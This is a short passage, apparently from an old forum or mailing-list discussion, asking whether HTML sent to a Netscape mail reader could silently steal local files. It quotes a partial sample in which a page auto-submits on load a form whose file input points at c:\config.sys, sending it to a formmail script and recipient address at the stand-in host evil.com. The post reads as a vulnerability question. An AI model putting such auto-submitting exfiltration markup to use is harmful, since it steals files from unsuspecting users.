...

Here is a sample it isn't complete but you get the basic idea of what is going on <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>

<BODY onLoad="daForm.submit()"> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>

<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

and so on and so forth...

So if someone was using Netscape to read mail, and I included a small bit of HTML like the above, I could snarf up files out of everywhere?